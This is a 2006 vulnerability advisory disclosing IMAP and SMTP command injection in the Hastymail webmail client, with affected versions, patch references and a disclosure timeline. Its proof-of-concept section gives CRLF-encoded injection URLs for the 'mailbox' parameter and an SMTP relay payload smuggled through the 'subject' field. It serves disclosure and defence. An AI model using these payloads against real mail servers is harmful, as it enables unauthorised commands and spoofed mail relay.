ISAA-2006-011.txt

`=============================================  
INTERNET SECURITY AUDITORS ALERT 2006-011  
- Original release date: September 28, 2006  
- Last revised: December 1, 2006  
- Discovered by: Vicente Aguilera Diaz  
- Severity: 3/5  
=============================================  
  
I. VULNERABILITY  
-------------------------  
IMAP/SMTP Injection in Hastymail.  
  
II. BACKGROUND  
-------------------------  
Hastymail is yet another webmail IMAP client written in PHP. Hastymail  
is designed for speed, RFC compatibility, simplicity, and security.  
Our goal is to create a simple interface with powerful but easy to use  
options that make managing your IMAP account effective and fast.  
  
Hastymail is NOT groupware. We are focused on being a functional and  
fast webmail client.  
  
The product homepage is http://hastymail.sourceforge.net/  
  
III. DESCRIPTION  
-------------------------  
Hastymail provides a graphical interface to interact with mail servers  
across the IMAP/SMTP protocols.  
  
Improper command and information validation transmitted by Hastymail  
to the mail servers during the normal use of this application (for  
example, acceding to the mailbox) facilitates that an authenticate  
malicious user could inject arbitrary IMAP/SMTP commands into the mail  
servers used by Hastymail across parameters used by the webmail  
front-end in its communication with these mail servers.  
  
This is become dangerous because the injection of these commands  
allows an intruder to evade restrictions imposed at application level,  
and exploit vulnerabilities that could exist in the mail servers  
through IMAP/SMTP commands.  
  
IV. PROOF OF CONCEPT  
-------------------------  
== IMAP Injection example (1.5 version) =============  
Hastymail Vulnerable parameter: "mailbox" (and possibly others)  
  
When a user access to a folder (for example, "INBOX"), he creates a  
GET request as:  
http://<webserver>/<path_to_hastymail>/html/mailbox.php?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX  
  
A malicious user can modify the value of the "mailbox" parameter and  
inject any IMAP command.  
The IMAP command injection has the following structure:  
http://<webserver>/<path_to_hastymail>/html/mailbox.php?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX%2522%0d%0a<ID>%20<INJECT_IMAP_COMMAND_HERE>%0D%0A<ID>%20SELECT%20%2522INBOX  
To observe that there has been in use double URL encoding for  
codifying the quote character (").  
  
Example:  
Injection of the CREATE IMAP command across the "mailbox" parameter:  
http://<webserver>/<path_to_hastymail>/html/mailbox.php?id=47fc54216aae12d57570c9703abe1b7d&mailbox=INBOX%2522%0d%0aA0003%20CREATE  
%2522INBOX.vad  
  
== SMTP Injection example (1.5 version) =============  
Hastymail Vulnerable parameter: "subject" (and possibly others)  
  
When a user send a message, he create a POST request like:  
POST http://<webserver>/<path_to_hastymail>/html/compose.php HTTP/1.1  
  
...  
-----------------------------84060780712450133071594948441  
Content-Disposition: form-data; name="subject"  
  
Proof of Concept  
-----------------------------84060780712450133071594948441  
...  
  
A malicious user can modify the value of the "subject" parameter and  
inject any SMTP command.  
Example: Relay from a non-existent e-mail address  
  
...  
-----------------------------84060780712450133071594948441  
Content-Disposition: form-data; name="subject"  
  
Proof of Concept  
.  
mail from: [email protected]  
rcpt to: [email protected]  
data  
This is a proof of concept of the SMTP command injection in Hastymail  
.  
  
-----------------------------84060780712450133071594948441  
...  
  
V. BUSINESS IMPACT  
-------------------------  
The IMAP/SMTP command injection allow to exploit vulnerabilities in  
the IMAP/SMTP servers and evade all the restrictions at the  
application layer.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
This vulnerability has been tested in:  
- Last development version: 1.5, released on February 17, 2006  
- Last stable version: 1.0.2, August 23, 2004  
  
Possibly all versions are affected by this vulnerability.  
  
VII. SOLUTION  
-------------------------  
Apply the patch: http://hastymail.sourceforge.net/security.php  
  
VIII. REFERENCES  
-------------------------  
http://hastymail.sourceforge.net/security.php  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered and reported  
by Vicente Aguilera Diaz (vaguilera=at=isecauditors=dot=com).  
  
X. REVISION HISTORY  
-------------------------  
September 28, 2006: Initial release  
October 3, 2006: Project admin response  
October 9, 2006: Project admin publish the patch for 1.5 and 1.02  
versions.  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
September 28, 2006: Vulnerability acquired by Vicente Aguilera Diaz  
Internet Security Auditors (www.isecauditors.com)  
December 1, 2006: Advisory published.  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is"  
with no warranties or guarantees of fitness of use or otherwise.  
Internet Security Auditors, S.L. accepts no responsibility for any  
damage caused by the use or misuse of this information.  
`